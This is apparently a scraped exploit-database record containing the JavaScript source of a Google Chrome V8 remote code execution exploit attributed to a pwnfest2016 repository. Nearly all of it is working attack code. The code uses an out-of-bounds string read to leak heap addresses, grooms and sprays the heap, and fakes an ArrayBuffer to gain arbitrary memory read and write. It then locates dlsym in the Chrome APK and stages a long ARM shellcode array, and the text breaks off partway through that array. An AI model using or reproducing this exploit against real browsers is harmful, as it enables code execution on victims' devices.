"2017-06-14T00:00:00", "href": "https://0day.today/exploit/description/27954", "id": "1337DAY-ID-27954", "title": "Google Chrome - V8 Private Property Arbitrary Code Execution Exploit", "type": "zdt", "sourceData": "<html>\r\n// Source: https://github.com/secmob/pwnfest2016/\r\n<script>\r\nfunction exploit(){\r\n \r\nfunction to_hex(num){\r\n return (num>>>0).toString(16);\r\n}\r\nfunction intarray_to_double(int_arr){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n uBuf[0]=int_arr[0];\r\n uBuf[1]=int_arr[1];\r\n return dBuf[0];\r\n}\r\n \r\nfunction str_to_double(str){//leng of str must be 8\r\n var dBuf = new Float64Array(1);\r\n var u8Buf = new Uint8Array(dBuf.buffer);\r\n for(var i=0;i<str.length;i++){\r\n u8Buf[i] = str.charCodeAt(i);\r\n }\r\n return dBuf[0];\r\n}\r\nfunction double_to_array(value){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n dBuf[0]=value;\r\n return uBuf;\r\n}\r\n \r\nfunction gc(){\r\n for(var i=0;i<0x100000/16;i++){\r\n new String;\r\n }\r\n}\r\nfunction getHiddenValue(){\r\n var obj = {};\r\n var oob = \"/re/\";\r\n //oob = oob.replace(\"re\",\"*\".repeat(0x2000));\r\n oob = oob.replace(\"re\",\"*\".repeat(0x100000));\r\n var str = 'class x extends Array{'+oob+\"}\";\r\n var fun = eval(str);\r\n Object.assign(obj,fun);\r\n return obj;\r\n}\r\nvar obWin;\r\nfunction makeOobString(){\r\n var hiddenValue = getHiddenValue();\r\n var magicStr = \"bbbb\";\r\n var arr=[];\r\n var str = 'class x extends Array{}';\r\n for(var i=0;i<str.length;i++){\r\n arr[i]=str.charCodeAt(i);\r\n }\r\n var ob = new Array(0x200);\r\n ob.fill(0x31313131);\r\n gc();\r\n gc();\r\n str=String.fromCharCode.apply(null,arr);\r\n ob=ob.concat(0x32323232);\r\n var fun = eval(str); \r\n ob[2]=str;\r\n ob[3]=ob;\r\n Object.assign(fun,hiddenValue);\r\n var oobString = fun.toString();\r\n gc();\r\n gc();\r\n print(\"begin search\");\r\n var subStr = oobString.substr(0,0x8000);\r\n var pos = subStr.indexOf(magicStr);\r\n print(\"end search\");\r\n if(pos==-1){\r\n print(\"find magic failed\");\r\n postMessage(false);\r\n self.close();\r\n print(\"unpossible\");\r\n throw \"error\";\r\n }else{\r\n print(\"find magic at \"+pos);\r\n \r\n }\r\n oobString = oobString.substr(pos,ob.length*4);\r\n obWin=ob;\r\n return oobString;\r\n}\r\nvar oobString = makeOobString();\r\nprint(\"get oob string successfully\");\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n /*document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");*/\r\n}\r\nfunction str2arr(str,len){//len must be multile of 4\r\n if(len===undefined)\r\n len = str.length;\r\n var u8a = new Uint8Array(len);\r\n for(var i=0;i<len;i++){\r\n u8a[i] = str.charCodeAt(i);\r\n }\r\n return new Uint32Array(u8a.buffer);\r\n}\r\nfunction pArrayInHex(arr){\r\n var result=\"<p style='font-size:8px'>\";\r\n for(var i=0;i<arr.length;i++){\r\n result+=(arr[i]+0x100000000).toString(16).substr(-8);\r\n result+=\" \";\r\n if(i%8==7)\r\n result+=\"<p style='font-size:8px'>\";\r\n }\r\n result+=\"<p>\";\r\n print(result);\r\n //alert(result);\r\n return result;\r\n}\r\nfunction pStrInHex(str){\r\n //var result=\"<p style='font-size:8px'>\";\r\n var result=\"\\n\";\r\n for(var i=0;i<str.length;i++){\r\n var code = str.charCodeAt(i);\r\n result+=(code+0x100).toString(16).substr(-2);\r\n if(i%4==3)\r\n result+=\" \";\r\n if(i%32==31)\r\n // result+=\"<p style='font-size:8px'>\";\r\n result+=\"\\n\";\r\n }\r\n // result+=\"<p>\";\r\n result+=\"\\n\";\r\n print(result);\r\n return result;\r\n}\r\nfunction getObjAddr(obj){\r\n obWin[0]=obj;\r\n var value2= ((str2arr(oobString,4))[0]);\r\n return value2>>>0;\r\n}\r\n \r\nvar getObj24BitsAddr = function(){\r\n var smi=0;\r\n var code = 0;\r\n var i=0;\r\n //don't allocate heap object\r\n function getAddr(obj){\r\n obWin[0]=obj;\r\n value=0;\r\n code = 0;\r\n i=0;\r\n for(i=2;i>=0;i--){\r\n code = oobString.charCodeAt(i);\r\n value = code+value*256;\r\n }\r\n return value;\r\n }\r\n return getAddr;\r\n}();\r\n \r\n \r\nvar lengthInOldSpace = 0xfffffffc;\r\nvar abarr=new Array(800);\r\nfunction sprayVM(){\r\n var i=0;\r\n var j=0;\r\n try{\r\n for(i=0;i<20;i++){\r\n var u8 = new Uint8Array(0x10000000-0x500);\r\n abarr[i]=u8;\r\n }\r\n }catch(e){}\r\n try{\r\n for(j=0;j<100;j++){\r\n var u8 = new Uint8Array(0x8000000-0x500);\r\n abarr[i+j]=u8;\r\n }\r\n }catch(e){}\r\n print(\"allocate \"+i+\" 256M \"+j+\" 16M \")\r\n function getRandomInt(min, max) {\r\n min = Math.ceil(min);\r\n max = Math.floor(max);\r\n return Math.floor(Math.random() * (max - min)) + min;\r\n }\r\n delete abarr[getRandomInt(0,i)];\r\n}\r\n \r\n \r\nfunction getNewSpaceAddrs(){\r\n /*var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";*/\r\n var objsInNewSpace = new Array(80);\r\n for(var i=0;i<objsInNewSpace.length;i++){\r\n //var xx=escape(str);\r\n var xx = new Array(0x70000/4);\r\n objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;\r\n //\u4f7fnewspace\u66f4\u79bb\u6563\r\n new Uint8Array(0x100000-0x500);\r\n new Uint8Array(0x100000-0x500);\r\n }\r\n function compareNumbers(a, b) {\r\n return a - b;\r\n }\r\n objsInNewSpace = Array.from(new Set(objsInNewSpace));\r\n objsInNewSpace = objsInNewSpace.sort(compareNumbers);\r\n return objsInNewSpace;\r\n}\r\n \r\n \r\nprint(\"begin get new space address\");\r\nvar objsInNewSpace = getNewSpaceAddrs();\r\nwhile(objsInNewSpace.length<16){\r\n objsInNewSpace = getNewSpaceAddrs();\r\n print(\"new space addresses\");\r\n pArrayInHex(objsInNewSpace);\r\n}\r\n \r\ntry{\r\nsprayVM();\r\n}catch(e){}\r\n \r\nvar selectedTrunk = 0;\r\nvar selectedStr = \"\";\r\nfunction bruteForceFengShui(){\r\n var huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000\r\n huge_str +=\"%\";\r\n var hold = new Array(100);\r\n //var holdaddress = new Array(100);\r\n for(var i=0;;i++){\r\n var large = escape(huge_str);\r\n var addr = getObjAddr(large);\r\n //console.log(addr.toString(16) + \" \"+i);\r\n if(i<hold.length){\r\n hold[i]=large;\r\n //holdaddress[i]=addr;\r\n }\r\n addr=(addr&0xfff00000)>>>0;\r\n addr = addr-0x100000;\r\n if(objsInNewSpace.indexOf(addr)!=-1){\r\n selectedTrunk = addr;\r\n selectedStr = large;\r\n abarr.fill(1);\r\n hold.fill(1);\r\n //holdaddress.fill(1);\r\n break;\r\n }\r\n if(i===150){\r\n /*i=0;\r\n print(\"tried 200 times\");\r\n abarr.fill(1);\r\n try{\r\n sprayVM();\r\n }catch(e){};*/\r\n postMessage(false);\r\n close();\r\n throw \"exceed limits\";\r\n }\r\n }\r\n}\r\nbruteForceFengShui();\r\n//to avoid allocate memory latter, initilize here\r\nvar nextTrunk = selectedTrunk + 0x100000;\r\n \r\n//\u751f\u6210\u4e00\u5757\u8db3\u591f\u5927\u7684\u53ef\u8bfb\u5199\u5185\u5b58\r\nvar huge_str = \"eval('');\";\r\n//8000\u4e0d\u80fd\u592a\u5927\uff0c\u592a\u5927\u4f1a\u4f7fnew_space\u589e\u5927\r\nfor(var i=0;i<8000;i++) huge_str += 'a.a;';\r\nhuge_str += \"return 10;\";\r\nvar huge_func = new Function('a',huge_str);\r\nhuge_func({});\r\n \r\nfunction fillNewSpace(origObj){\r\n //first object in new space at 0x8100, new spaces layout\r\n //0x40000\r\n //0x37f00\r\n //.....\r\n //0x40000\r\n var gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25\r\n var gap = gap+\"%\";\r\n //flat gap\r\n gap.substr(0,100);\r\n var fillstr = \"%20a\".repeat((0x40000-12)/4);\r\n fillstr = escape(fillstr);\r\n var addr=0;\r\n for(var i=0;i<0x100;i++){\r\n addr = getObj24BitsAddr(origObj);\r\n if((addr&0xfffff)===0x8101)\r\n origObj=escape(gap);\r\n else\r\n origObj=unescape(fillstr);\r\n }\r\n}\r\n \r\nfunction findNewSpace(){\r\n var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";\r\n for(var i=0;;i++){\r\n var xx=escape(str);\r\n var straddr = getObjAddr(xx);\r\n addr=(straddr&0xfff00000)>>>0;\r\n if(addr===selectedTrunk){\r\n print(\"good state \"+straddr.toString(16));\r\n break;\r\n }\r\n }\r\n}\r\n \r\nfunction myencode(str){\r\n var arr = [];\r\n for(var i=0;i<str.length;i++){\r\n if(i%2==1)\r\n arr.push(str.charCodeAt(i));\r\n else{\r\n arr.push(37);//%\r\n var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);\r\n arr.push(hexstr.charCodeAt(0));\r\n arr.push(hexstr.charCodeAt(1));\r\n }\r\n }\r\n return String.fromCharCode.apply(null,arr);\r\n}\r\n \r\nvar dArray = [];\r\nvar index = (0x8100-36)*2;\r\nfor(var i=0;i<0x20000/8;i++){\r\n dArray[i]=str_to_double(\"%03x%03x\");\r\n}\r\n \r\nvar occulen = 0;\r\nvar i = 0;\r\nvar savedChunk = new Uint8Array(0x8100);\r\nvar hiddenValue = getHiddenValue();\r\nvar arr=[];\r\nfillNewSpace(new String);\r\nfindNewSpace();\r\nvar classStr = 'class x extends Array{}';\r\nfor(var i=0;i<classStr.length;i++){\r\n arr[i]=classStr.charCodeAt(i);\r\n}\r\nvar magicStr = String.fromCharCode(0x86,0x24);\r\nclassStr=String.fromCharCode.apply(null,arr);\r\nvar ab = new ArrayBuffer(0x1243);\r\nvar fun = eval(classStr); \r\nObject.assign(fun,hiddenValue);\r\nvar oobStr = fun.toString();\r\n \r\n/*(gdb) x/20xw 0x5600c45c array buffer layout\r\n * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020\r\n * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000\r\n */\r\n//overwrite huge string as array buffer\r\nvar abLengthIndex = oobStr.indexOf(magicStr);\r\nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32);\r\n//replace the byteLength\r\nvar LengthAddr = getObjAddr(lengthInOldSpace);\r\nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);\r\nvar strBase = \"\\x00\\x00\\x00\\x00\";\r\nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);\r\nstrArrayBuffer = myencode(strArrayBuffer);\r\nfor(var i=0;i<strArrayBuffer.length/8;i++){\r\n var d = strArrayBuffer.substr(i*8,8);\r\n dArray[index/8+i] = str_to_double(d);\r\n}\r\n \r\nvar classStrAddr = getObjAddr(classStr)>>>0;\r\n//set read position\r\nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head\r\n//length control the length of unscaped string, generated string has 12 bytes head\r\n//left 0x1000*2 bytes to avoid gc\r\nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);\r\n \r\n//save the the chunk head to be corrupted\r\nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;\r\nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);\r\nfor(var i =0;i<savedThunkStr.length;i++){\r\n savedChunk[i] = savedThunkStr.charCodeAt(i);\r\n}\r\n \r\nvar pos1=new String;\r\nvar pos1addr = getObj24BitsAddr(pos1)-1;\r\n \r\n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \r\nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);\r\n//minus the length of double array\r\nif(occulen<0x40000+16+8)\r\n throw \"no enough room\";\r\nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray\r\nif(occulen%4!==0)\r\n throw \"length don't align\";\r\nvar arrocc=new Array((occulen/4)); \r\n//set unescape write position\r\nvar occDoubleArray = dArray.concat();\r\n \r\nvar b=unescape(subOobStr);\r\n//restore the corrupted chunk head\r\nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);\r\nfor(var i=0;i<savedChunk.length;i++){\r\n u8[i] = savedChunk[i];\r\n}\r\n \r\nprint(\"long string allocated at \"+classStrAddr.toString(16));\r\nif(typeof(selectedStr)===\"string\"){\r\n print(\"overwrite failed\");\r\n postMessage(false);\r\n close();\r\n return;\r\n //throw \"overwrite failed\";\r\n}\r\nvar fakeab = selectedStr;\r\nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16));\r\nvar globaldv = new Uint32Array(fakeab);\r\n \r\nfunction read_uint32(from_address){\r\n var u32 = globaldv[(from_address/4)>>>0];\r\n return u32>>>0;\r\n}\r\n \r\n \r\nfunction read_uint8(from_address){\r\n from_address = from_address>>>0;\r\n var index = (from_address/4)>>>0;\r\n var mask = from_address%4;\r\n var u32 = globaldv[index];\r\n u32 = u32<<8*(3-mask);\r\n return u32>>>24;\r\n}\r\n \r\nfunction read_uint32_unalign(from_address){\r\n var u32 = 0;\r\n for(var i=3;i>=0;i--){\r\n var u8 = read_uint8(from_address+i);\r\n u32 = u32*0x100+u8;\r\n }\r\n return u32>>>0;\r\n}\r\n \r\n//rw to execute\r\n//get function point of v8::internal::Accessors::ReconfigureToDataProperty\r\nfunction getFixedFunctionPoint(fakeab){\r\n var FunctionAddress = getObjAddr(Function);\r\n var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);\r\n var map = u32[0];\r\n u32 = new Uint32Array(fakeab,map-1,0x1000);\r\n //instance descriptors\r\n var descriptors = u32[7];\r\n u32 = new Uint32Array(fakeab,descriptors-1,0x1000);\r\n var lengthAccessorInfo = u32[6];\r\n u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);\r\n var setterForeign = u32[4];\r\n u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);\r\n var functionPoint = u32[1];\r\n return functionPoint-1;\r\n}\r\n \r\nvar funPoint = getFixedFunctionPoint(fakeab);\r\nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16));\r\nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval\r\n \r\nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000\r\nprint(\"chrome.apk base at \"+point.toString(16));\r\n \r\nfunction find(startAddr,len,pattern){\r\n for(var i=0; i<(len-pattern.length); i++ ) {\r\n for(var j=0;j<pattern.length;j++){\r\n var temp = read_uint8(startAddr+i+j);\r\n //print(temp.toString(16));\r\n if(temp!=pattern[j]) break;\r\n }\r\n if(j==pattern.length) return startAddr+i;\r\n }\r\n print(\"find failed\");\r\n}\r\nvar pattern_position=find(point,0x10000000,pattern);\r\n \r\nprint(\"find pattern at \"+to_hex(pattern_position));\r\n \r\n \r\n \r\n \r\n \r\nfunction get_dest_from_blx(addr) {\r\n var val = read_uint32_unalign(addr);\r\n var s = (val & 0x400) >> 10;\r\n var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);\r\n var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);\r\n var i10h = val & 0x3ff;\r\n var i10l = (val & 0x7fe0000) >> 17;\r\n var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);\r\n return ((addr + 4) & ~3) + off;\r\n}\r\n \r\nfunction backup_original_code(start_address){\r\n var backup_arr = [];\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n backup_arr[i]=u8arr[i];\r\n }\r\n return backup_arr;\r\n}\r\n \r\nfunction restore_original_code(start_address,backup_arr){\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n u8arr[i]=backup_arr[i];\r\n }\r\n}\r\n \r\n \r\nhuge_func({});\r\nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4)));\r\nvar dlsym_addr = get_dest_from_blx(pattern_position-4);\r\nprint(\"dlsym address is \"+to_hex(dlsym_addr));\r\nvar huge_func_address = getObjAddr(huge_func)-1;\r\nprint(\"huge func address is \"+to_hex(huge_func_address));\r\nfor(var i=0;i<20;i++){\r\n print(to_hex(read_uint32(huge_func_address+i*4)));\r\n}\r\nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4\r\nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry));\r\nprint(to_hex(read_uint32(huge_func_code_entry)));\r\n \r\n//var so_str= \"\";\r\nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,